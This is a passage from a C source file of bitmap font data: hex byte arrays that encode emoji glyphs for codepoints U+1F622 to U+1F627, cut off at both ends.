0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0xf, 0xf0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x3f, 0xff, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x7e, 0x7, 0xe0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x78, 0x0, 0x78, 0x0, 0x38, 0x0, 0x38,
0x0, 0xf0, 0x0, 0xf, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x30, 0x0, 0x3, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F622 "😢" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x78, 0x0, 0x0, 0x1c,
0x0, 0xe0, 0xe, 0x0, 0xfc, 0x0, 0x0, 0xf,
0x80, 0x38, 0x7, 0x0, 0xf8, 0x0, 0x0, 0x1,
0xe0, 0x1c, 0x7, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x78, 0x7, 0x3, 0x80, 0xf0, 0x0, 0x0, 0x0,
0xe, 0x3, 0x83, 0x80, 0xf0, 0x0, 0x0, 0x0,
0x3, 0x80, 0xe1, 0xc0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x71, 0xc0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x70, 0x3c, 0xe0, 0x10, 0x0, 0x0, 0x0,
0x0, 0x10, 0xe, 0x70, 0x0, 0xf, 0x0, 0x0,
0x3c, 0x0, 0x7, 0x38, 0x0, 0xf, 0xc0, 0x0,
0x3f, 0x0, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x0, 0x3f, 0x0,
0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0xf, 0x0,
0x0, 0x3c, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x4, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x3, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x3, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x1, 0xf0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x1, 0xdc,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0xc7,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x60,
0xe0, 0x0, 0x0, 0x0, 0x1, 0xc3, 0x80, 0x70,
0x70, 0xff, 0xc0, 0x0, 0x1, 0xc0, 0xe0, 0x70,
0x1f, 0xff, 0xfe, 0x0, 0x0, 0xe0, 0x70, 0x30,
0xf, 0xe0, 0x1f, 0xc0, 0x0, 0xf0, 0x1c, 0x18,
0x3, 0x80, 0x1, 0xf8, 0x0, 0x70, 0xf, 0x18,
0x1, 0xc0, 0x0, 0x18, 0x0, 0x70, 0x3, 0x8c,
0x0, 0x60, 0x0, 0x4, 0x0, 0x78, 0x0, 0xee,
0x0, 0x38, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7e,
0x0, 0xc, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1f,
0x0, 0x6, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x7,
0x80, 0x3, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xc0, 0x1, 0x80, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x60, 0x0, 0xc0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x30, 0x0, 0xe0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xc, 0x0, 0x60, 0x0, 0x0, 0x78, 0x0, 0x0,
0x7, 0x0, 0x70, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x1, 0xc0, 0xf0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x7f, 0xf0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0xf, 0xff, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F623 "😣" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x8, 0x0, 0x0, 0x20,
0x0, 0xe0, 0xe, 0x0, 0xe, 0x0, 0x0, 0x38,
0x0, 0x38, 0xf, 0x0, 0xe, 0x0, 0x0, 0xe,
0x0, 0x1c, 0x7, 0x0, 0xe, 0x0, 0x0, 0x3,
0x80, 0x7, 0x3, 0x80, 0x1e, 0x0, 0x0, 0x0,
0xf0, 0x3, 0x83, 0x80, 0x7e, 0x0, 0x0, 0x0,
0x3f, 0x0, 0xe1, 0xc0, 0x7c, 0x0, 0x0, 0x0,
0x7, 0xc0, 0x71, 0xc0, 0x10, 0x0, 0x0, 0x0,
0x0, 0x40, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x10, 0x0, 0x0,
0x0, 0x10, 0x0, 0x7e, 0x0, 0xf, 0x0, 0x0,
0x0, 0x78, 0x0, 0x3f, 0x0, 0x7, 0xe0, 0x0,
0x0, 0xfc, 0x0, 0x1f, 0x80, 0x0, 0x78, 0x0,
0x0, 0xf0, 0x0, 0xf, 0xc0, 0x0, 0xf, 0x0,
0x1, 0xe0, 0x0, 0x7, 0xe0, 0x0, 0x3, 0xc0,
0x1, 0xe0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x70,
0x1, 0xc0, 0x0, 0x1, 0xf8, 0x0, 0x1, 0xfc,
0x1, 0xfc, 0x0, 0x0, 0xfc, 0x0, 0x7, 0xfe,
0x0, 0xff, 0xc0, 0x0, 0x7e, 0x0, 0xf, 0xc0,
0x0, 0x1, 0xf8, 0x0, 0x3f, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x3d, 0xc0, 0x1e, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x1c, 0xe0, 0xc, 0x0,
0x0, 0x0, 0x0, 0x60, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x3f, 0x80, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0xff, 0xf8, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x1, 0xf0, 0x1f, 0x0, 0x0, 0x70, 0x7, 0x0,
0x1, 0xe0, 0x3, 0xc0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0xc0, 0x0, 0x70, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x40, 0x0, 0x10, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F624 "😤" */
0x0, 0x0, 0x0, 0x7, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfe, 0x0, 0x3f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x1f,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x3e, 0x0, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x7c, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x70,
0x40, 0x0, 0x0, 0x4, 0x1e, 0x0, 0x0, 0x7,
0x3, 0xc0, 0x0, 0x1, 0xe0, 0x78, 0x0, 0x0,
0x70, 0x3f, 0x0, 0x0, 0x1f, 0x81, 0xc0, 0x0,
0x7, 0x0, 0x3e, 0x0, 0x3, 0xe0, 0x7, 0x0,
0x0, 0x70, 0x0, 0x78, 0x0, 0x3c, 0x0, 0x1c,
0x0, 0x3, 0x0, 0x1, 0xe0, 0x3, 0xc0, 0x0,
0x70, 0x0, 0x38, 0x0, 0x7, 0x80, 0x3c, 0x0,
0x3, 0x80, 0x3, 0x80, 0x0, 0x1c, 0x1, 0xc0,
0x0, 0xe, 0x0, 0x1c, 0x0, 0x0, 0x60, 0xc,
0x0, 0x0, 0x70, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0xc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x30, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0xe0, 0x2, 0x0, 0x20, 0x8, 0x0, 0x80, 0xe,
0x6, 0x0, 0x3c, 0x7, 0x80, 0xf0, 0x1e, 0x0,
0x38, 0x30, 0x1, 0xff, 0xfc, 0x7, 0xff, 0xf0,
0x1, 0xc1, 0x80, 0x1, 0xff, 0x0, 0x7, 0xfc,
0x0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x87, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe, 0x0, 0x0,
0x10, 0x0, 0x4, 0x0, 0x0, 0x38, 0x30, 0x0,
0x7, 0x0, 0x0, 0x1c, 0x0, 0x1, 0xc1, 0x80,
0x1, 0xf8, 0x0, 0x0, 0xfc, 0x0, 0xe, 0xf,
0xe0, 0x7f, 0x80, 0x0, 0x3, 0xfc, 0xf, 0xe0,
0x7f, 0xdf, 0xfc, 0x0, 0x0, 0x1f, 0xfd, 0xff,
0x7, 0x8f, 0xf8, 0xe0, 0x0, 0x0, 0xe3, 0xfe,
0x3c, 0x38, 0x1e, 0xe, 0x0, 0x0, 0x3, 0x87,
0xc0, 0xe3, 0x80, 0xc0, 0x70, 0xf, 0xe0, 0x1c,
0x6, 0x3, 0x9c, 0x0, 0x3, 0x3, 0xff, 0xe0,
0x60, 0x0, 0x1c, 0xe0, 0x0, 0x38, 0x7c, 0x7,
0xc3, 0x80, 0x0, 0xe7, 0x0, 0x1, 0x87, 0x80,
0xf, 0xc, 0x0, 0x7, 0x38, 0x0, 0x1c, 0x30,
0x0, 0x18, 0x70, 0x0, 0x38, 0xe0, 0x0, 0xc0,
0x0, 0x0, 0x1, 0x80, 0x3, 0x87, 0x80, 0xe,
0x0, 0x0, 0x0, 0xe, 0x0, 0x3e, 0x70, 0x0,
0x78, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x77, 0x80,
0x1, 0xe0, 0x0, 0x0, 0xf, 0x0, 0x1, 0xf8,
0x0, 0x7, 0x0, 0x0, 0x0, 0x70, 0x0, 0xf,
0xc0, 0x0, 0x38, 0x0, 0x0, 0x3, 0x80, 0x0,
0x7e, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x1c, 0x0,
0x3, 0xf0, 0x10, 0xe, 0x0, 0x0, 0x0, 0xe0,
0x20, 0x1d, 0xc0, 0xc0, 0xe0, 0x0, 0x0, 0x3,
0x81, 0x81, 0xc7, 0x9f, 0xf, 0x0, 0x0, 0x0,
0x1e, 0x1f, 0x3c, 0x1f, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x7f, 0xff, 0xc0, 0x3c, 0x3f, 0x0, 0x0,
0x0, 0x1, 0xfc, 0x78, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0, 0x0,
0xfc, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x1, 0xfc, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xe0, 0x0, 0x0, 0x0,
/* U+1F625 "😥" */
0x0, 0x0, 0x0, 0x7, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xe0, 0x7, 0xf8, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x3e,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x1,
0xf0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x80, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x1c, 0x0,
0x38, 0x0, 0x0, 0x30, 0x0, 0xe0, 0x3, 0x80,
0xf, 0x0, 0x0, 0xf, 0x0, 0xe, 0x0, 0xe0,
0x7, 0xc0, 0x0, 0x0, 0xf8, 0x1, 0xc0, 0x18,
0x3, 0xf0, 0x0, 0x0, 0xf, 0xc0, 0x1c, 0x7,
0x7, 0xf8, 0x0, 0x0, 0x0, 0x7f, 0x83, 0x80,
0xe0, 0x7c, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x38,
0x38, 0x8, 0x0, 0x0, 0x0, 0x0, 0x4, 0x7,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x9c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x73, 0x6, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x60, 0xc0, 0xf, 0x0, 0x0,
0x3c, 0x0, 0x1, 0xcc, 0x3c, 0x3, 0xf0, 0x0,
0xf, 0xc0, 0x0, 0x3b, 0x8f, 0xc0, 0x7f, 0x0,
0x3, 0xfc, 0x0, 0x7, 0x71, 0xf8, 0x1f, 0xe0,
0x0, 0x7f, 0x80, 0x0, 0xe6, 0x73, 0x83, 0xfc,
0x0, 0xf, 0xf0, 0x0, 0x1c, 0xde, 0x78, 0x7f,
0x80, 0x1, 0xfe, 0x0, 0x3, 0x9b, 0x87, 0x7,
0xf0, 0x0, 0x3f, 0xc0, 0x0, 0x73, 0xe0, 0x70,
0xfc, 0x0, 0x3, 0xf0, 0x0, 0xe, 0x7c, 0xf,
0xf, 0x0, 0x0, 0x3c, 0x0, 0x3, 0xcf, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xc0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x78,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xce,
0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x79,
0xc0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xe,
0x78, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x1,
0xce, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x71, 0xc0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x38, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x3, 0x87, 0x0, 0x3, 0x80, 0xf, 0xe0, 0x0,
0x0, 0x70, 0xe0, 0x0, 0x70, 0xf, 0xff, 0x0,
0x0, 0x1c, 0x1c, 0x0, 0xe, 0x3, 0xc0, 0xf8,
0x0, 0x7, 0x81, 0xc0, 0x3, 0x81, 0xe0, 0x7,
0x80, 0x0, 0xe0, 0x38, 0x0, 0x70, 0x78, 0x0,
0x78, 0x0, 0x38, 0x3, 0x80, 0x1c, 0x1e, 0x0,
0x7, 0x80, 0xe, 0x0, 0x3c, 0xf, 0x1, 0x80,
0x0, 0x70, 0x3, 0x80, 0x3, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xf0, 0x0, 0x1f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x3e, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0xf, 0xf0, 0x3, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F626 "😦" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x3, 0xc0, 0x0,
0xf, 0x0, 0x0, 0xfc, 0x0, 0x3, 0xf0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x0, 0x7f, 0x80,
0x1, 0xfe, 0x0, 0x7, 0xe0, 0x0, 0x3f, 0xc0,
0x0, 0xff, 0x0, 0x3, 0xf0, 0x0, 0xf, 0xc0,
0x0, 0x3f, 0x0, 0x1, 0xf8, 0x0, 0x3, 0xc0,
0x0, 0xf, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1, 0xff, 0x80, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x3, 0xff, 0xf0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x7, 0xff, 0xfe, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x7, 0xff, 0xff, 0x80, 0x0, 0xe0, 0x1c, 0x0,
0x7, 0xff, 0xff, 0xe0, 0x0, 0x70, 0x7, 0x0,
0x3, 0xff, 0xff, 0xf0, 0x0, 0x70, 0x3, 0xc0,
0x1, 0xff, 0xff, 0xf8, 0x0, 0x78, 0x0, 0xe0,
0x0, 0xff, 0xff, 0xfc, 0x0, 0x38, 0x0, 0x38,
0x0, 0x7f, 0xff, 0xfe, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x1f, 0xff, 0xfe, 0x0, 0x38, 0x0, 0x7,
0x80, 0x3, 0x0, 0xc, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F627 "😧" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
